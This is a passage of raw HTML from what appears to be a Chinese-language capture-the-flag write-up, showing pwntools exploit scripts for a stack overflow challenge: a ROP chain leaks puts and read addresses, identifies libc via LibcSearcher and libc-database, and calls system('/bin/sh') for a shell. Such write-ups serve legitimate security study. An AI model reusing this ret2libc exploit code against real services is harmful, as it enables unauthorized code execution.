#ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of puts is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">LibcSearcher<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> puts_real<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">libc_base <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> puts_real <\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">dump<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The base address of libc is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">libc_base<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">system <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">dump<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">system<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">sh <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> libc_base <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> libc<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">dump<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">str_bin_sh<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">sh<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">system<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">interactive<\/span><span style=\"color: #ECEFF4\">()<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u591a\u6b21\u5c1d\u8bd5\u4e4b\u540e\u53ef\u4ee5\u53d1\u73b0\u6b63\u786e\u7684\u7248\u672c\u4e3a<code>libc6_2.23-0ubuntu10_amd64<\/code>\uff0c\u5728\u8fdb\u884c\u5982\u4e0b\u4ea4\u4e92\u4e4b\u540e\u6211\u4eec\u5c31\u53ef\u4ee5\u83b7\u5f97shell\u4e86\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-21.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-21.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"489\" height=\"329\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-21.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-154\"  sizes=\"auto, (max-width: 489px) 100vw, 489px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<h5 class=\"wp-block-heading\">\u901a\u8fc7<a href=\"https:\/\/libc.rip\/\">libc-database<\/a>\u786e\u5b9alibc\u7248\u672c<\/h5>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u4ee3\u7801\u6765\u8f93\u51fa<code>puts<\/code>\u548c<code>read<\/code>\u7684\u771f\u5b9e\u5730\u5740\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>from pwn import *  \n\np = remote(\"ip\", port)  \nelf = ELF(\".\/pwn\")  \n\nputs_plt = elf.plt&#91;'puts'&#93;  \nputs_got = elf.got&#91;'puts'&#93;  \nread_got = elf.got&#91;'read'&#93;  \npop_rdi = 0x400733  \nret = 0x4004c9  \nvuln = 0x40067D  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nputs_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of puts is\", hex(puts_real))  \n\npayload = b'a' * 0x20 + b'=Triode=' + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(vuln)  \n\np.sendlineafter(b\"Pull up your sword and tell me u story!\", payload)  \n\nread_real = u64(p.recvuntil(b'\\x7f')&#91;-6:&#93;.ljust(8, b'\\x00'))  \nprint(\"&#91;+&#93; The real address of read is\", hex(read_real))<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">from<\/span><span style=\"color: #D8DEE9FF\"> pwn <\/span><span style=\"color: #81A1C1\">import<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">remote<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">ip<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> port<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">elf <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ELF<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">.\/pwn<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_plt <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">plt<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">puts<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_got <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> elf<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #D8DEE9FF\">got<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">read<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">pop_rdi <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">400733<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">ret <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">4004c9<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">vuln <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">40067D<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">puts_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of puts is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_real<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">payload <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">a<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">*<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">0x<\/span><span style=\"color: #B48EAD\">20<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #A3BE8C\">=Triode=<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">pop_rdi<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_got<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">puts_plt<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">+<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">p64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">vuln<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">sendlineafter<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Pull up your sword and tell me u story!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> payload<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">read_real <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">u64<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">p<\/span><span style=\"color: #ECEFF4\">.<\/span><span style=\"color: #88C0D0\">recvuntil<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x7f<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">)&#91;<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">6<\/span><span style=\"color: #ECEFF4\">:&#93;.<\/span><span style=\"color: #88C0D0\">ljust<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">b<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #EBCB8B\">\\x00<\/span><span style=\"color: #ECEFF4\">&#39;<\/span><span style=\"color: #ECEFF4\">))<\/span><span style=\"color: #D8DEE9FF\">  <\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">print<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93; The real address of read is<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">hex<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">read_real<\/span><span style=\"color: #ECEFF4\">))<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u5f97\u5230\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-22.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"378\" height=\"46\" data-original=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-155\"  sizes=\"auto, (max-width: 378px) 100vw, 378px\" \/><\/div><\/a><\/figure>\n<\/div>\n\n\n<p>\uff08\u503c\u5f97\u6ce8\u610f\u7684\u662f\uff0c\u7531\u4e8e<code>libc<\/code>\u6bcf\u4e00\u6b21\u8fd0\u884c\u7684\u57fa\u5740\u90fd\u662f\u4e0d\u4e00\u6837\u7684\uff0c\u6240\u4ee5\u6bcf\u4e00\u6b21\u8fd0\u884c\u5f97\u5230\u7684\u7ed3\u679c\u90fd\u4e0d\u540c)\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5728libc-database\u4e2d\u8fdb\u884c\u5982\u4e0b\u64cd\u4f5c\u627e\u5230\u4e24\u4e2a<code>libc<\/code>\u7248\u672c\uff1a<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a href=\"http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-23.png\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/www.triode.cc\/wp-content\/uploads\/2025\/09\/image-23-1024x266.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" 